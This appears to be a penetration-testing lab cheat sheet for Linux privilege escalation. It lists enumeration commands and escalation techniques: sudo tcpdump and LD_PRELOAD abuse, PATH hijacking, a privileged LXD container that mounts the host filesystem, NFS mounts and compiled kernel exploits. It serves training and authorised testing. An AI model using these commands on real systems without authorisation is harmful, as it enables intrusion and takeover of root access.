linux-privesc.md (3661B)
1 --- 2 title: "Linux Privilege Escalation" 3 description: "Linux privesc quick-reference: sudo, SUID/SGID, cron, LD_PRELOAD, LXD, NFS, capabilities and kernel." 4 category: privilege-escalation 5 tags: [privilege-escalation, linux, post-exploitation] 6 tools: [linPEAS, pspy, GTFOBins] 7 difficulty: intermediate 8 updated: "2026-08-09" 9 source: "vault:PrivEsc/Linux PrivEsc Cheat Sheet.md" 10 --- 11 12 # Linux Privilege Escalation 13 14 A dense command checklist for enumerating and exploiting privilege-escalation paths on Linux. Enumerate first (linPEAS / pspy), then map any finding against GTFOBins. 15 16 ## Enumeration 17 18 | Command | Description | 19 | --- | --- | 20 | `ssh htb-student@<target IP>` | SSH to lab target | 21 | `ps aux \| grep root` | See processes running as root | 22 | `ps au` | See logged in users | 23 | `ls /home` | View user home directories | 24 | `ls -l ~/.ssh` | Check for SSH keys for current user | 25 | `history` | Check the current user's Bash history | 26 | `sudo -l` | Can the user run anything as another user? | 27 | `ls -la /etc/cron.daily` | Check for daily Cron jobs | 28 | `lsblk` | Check for unmounted file systems/drives | 29 | `find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null` | Find world-writable directories | 30 | `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null` | Find world-writable files | 31 | `uname -a` | Check the kernel version | 32 | `cat /etc/lsb-release` | Check the OS version | 33 | `screen -v` | Check the installed version of `screen` | 34 | `./pspy64 -pf -i 1000` | View running processes with `pspy` | 35 | `echo $PATH` | Check the current user's PATH variable contents | 36 | `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null` | Search for config files | 37 | `./lynis audit system` | Perform a system audit with `Lynis` | 38 39 ## Kernel Exploits 40 41 | Command | Description | 42 | --- | --- | 43 | `gcc kernel_exploit.c -o kernel_exploit` | Compile an exploit written in C | 44 45 ## SUID / SGID Binaries 46 47 | Command | Description | 48 | --- | --- | 49 | `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null` | Find binaries with the SUID bit set | 50 | `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null` | Find binaries with the SETGID bit set | 51 | `sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root` | Priv esc with `tcpdump` | 52 53 ## PATH Abuse 54 55 | Command | Description | 56 | --- | --- | 57 | `echo $PATH` | Check the current user's PATH variable contents | 58 | `PATH=.:${PATH}` | Add a `.` to the beginning of the current user's PATH | 59 60 ## Shared Library / LD_PRELOAD 61 62 | Command | Description | 63 | --- | --- | 64 | `ldd /bin/ls` | View the shared objects required by a binary | 65 | `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart` | Escalate privileges using `LD_PRELOAD` | 66 | `readelf -d payroll \| grep PATH` | Check the RUNPATH of a binary | 67 | `gcc src.c -fPIC -shared -o /development/libshared.so` | Compile a shared library | 68 69 ## LXD / LXC 70 71 | Command | Description | 72 | --- | --- | 73 | `lxd init` | Start the LXD initialization process | 74 | `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine` | Import a local image | 75 | `lxc init alpine r00t -c security.privileged=true` | Start a privileged LXD container | 76 | `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true` | Mount the host file system in a container | 77 | `lxc start r00t` | Start the container | 78 79 ## NFS 80 81 | Command | Description | 82 | --- | --- | 83 | `showmount -e 10.129.2.12` | Show the NFS export list | 84 | `sudo mount -t nfs 10.129.2.12:/tmp /mnt` | Mount an NFS share locally | 85 86 ## Shared tmux Session 87 88 | Command | Description | 89 | --- | --- | 90 | `tmux -S /shareds new -s debugsess` | Create a shared `tmux` session socket |